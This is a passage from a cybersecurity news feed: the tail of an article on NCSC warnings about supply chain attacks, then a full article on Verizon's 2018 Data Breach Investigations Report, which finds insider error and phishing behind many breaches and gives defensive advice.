“It is clear that even if an organization has excellent cybersecurity, there can be no guarantee that the same standards are applied by contractors and third-party suppliers in the supply chain. Attackers will target the most vulnerable part of a supply chain to reach their intended victim.”

Supply chain attacks are extremely difficult to detect, even with the right network monitoring tools, as it can be hard to tell whether a discovered flaw has been introduced accidentally by the manufacturer or deliberately by attackers.

The NCSC recommended organizations follow the “least privilege” principle when granted third-parties remote access, and work Cyber Essentials certified organizations, or those that can demonstrate they follow the NCSC’s 10 Steps to Cybersecurity guidance.

Webroot director of threat research, David Kennerley, said the report's findings were no surprise.

“Organizations need to utilize a multi-layered approach with real-time threat intelligence to detect all types of emerging threats and stop attacks before they strike, while not forgetting the essential role of employee education within any organization,” he added.

“Employees are often seen as the weakest link with regards to security. It’s time to buck this trend, and instead utilize them as the first line of defense.”

Matt Walmsley, EMEA director at Vectra, added that firms need to adopt an “I’m already compromised” mentality.

“We need to… put in place security capabilities that not only block known threats but that are smart enough to detect and respond in real-time to active threats that have defeated or bypassed defensive controls and gained access and persistence within the organization,” he continued.

“Finally, we need the executive leadership and governance bodies of organizations to step up and recognize that security is a strategic organizational issue, not one simply of technology.”

The report comes just days after an NCSC warning that Russian state hackers are again targeting CNI supply chain organizations in the engineering and industrial control spheres.

Categories: Cyber Risk News

Insiders Blamed for Over a Quarter of Breaches

Tue, 04/10/2018 - 09:32
Insiders Blamed for Over a Quarter of Breaches

Employees emerged yet again as a major cyber-risk to organizations last year, accounting for 28% of breaches with human error a major factor contributing to data loss, according to Verizon.

The firm’s annual Data Breach Investigations Report for 2018 analyzed 2216 confirmed data breaches around the world and over 53,000 incidents from the previous year.

Although ransomware was pegged as the biggest malicious software threat, found in 39% of malware-related cases, the human element was highlighted as a major source of weakness in organizations.

In fact, user error was a factor in 17% of breaches, just behind the top pattern of web application attacks. In this case, “error” includes misconfigurations, of the sort seen often over the past year affecting firms with Amazon cloud installations, as well as publishing errors. However, “mis-delivery” was the biggest factor here.

It’s easy to do when using email to send sensitive data, especially with auto-fill, according to Verizon principal, Laurence Dine.

“That can best be prevented through regular training to remind employees of the sensitivities of the data they’re handling and of the need to pay close attention to who they’re sending emails to. For the occasions when mistakes do still happen, encryption can help to prevent files being opened by anyone other than the correct recipient,” he told Infosecurity.

Phishing is another key means by which employees are exposing their organization to the risk of breaches. Financial pretexting and phishing represent 93% of all breaches investigated in the report, with email the main entry point, and 4% of targets in any given phishing campaign will click through, according to Verizon.

“The insider human factor continues to be a key weakness across our analysis, given the regularity with which employees are still falling victim to social attacks,” said Dine. “Companies are nearly three-times more likely to get breached by social attacks than via actual vulnerabilities, emphasizing the need for ongoing employee cybersecurity education. Ultimately, employees should be a business’s first line of defense, rather than the weakest link in the security chain.”

Healthcare was the industry most affected by breaches (24%), and also the only sector in which insider threats (56%) outweighed those from external attackers (43%).

“Measures to protect against these vulnerabilities include segmenting clients from critical assets and using strong authentication measures, so hackers need more than a keylogger to compromise a user device. If the organization uses email in the cloud, then two-factor authentication is also advisable,” advised Dine.

“Organizations should also train responders along with the end-user base, testing their ability to detect a campaign, identify potential infected hosts, determine device activity post-compromise, and confirm the existence of data exfiltration. It can also help to provide role-specific training to users that are targeted based on their privileges or access to data. It’s particularly important to train employees with access to employee data or the ability to transfer funds to be more sceptical, as they are likely targets within the organization. It isn’t paranoia if someone really is out to get them.”

Overall, external attackers continue to be the number one breach threat by far, accounting for 73%, with half of those cybercrime gangs and 12% state-sponsored actors.

However, over-three-quarters (76%) of breaches were financially motivated, which illustrates not only the large numbers of cyber-criminals launching attacks, but also the persistent minority of malicious insiders.

“Deliberate misuse is the other key factor we see with insider threats, where employees are abusing their privileges to access data inappropriately. In these cases, having policies and processes in place to monitor when sensitive data is accessed is imperative to spotting any suspicious activity,” said Dine.

“It’s also advisable to make all employees aware via security training and awareness promotion that if they are known to have viewed any sensitive data without a genuine business need, then there is potential for disciplinary action to be taken.”

Categories: Cyber Risk News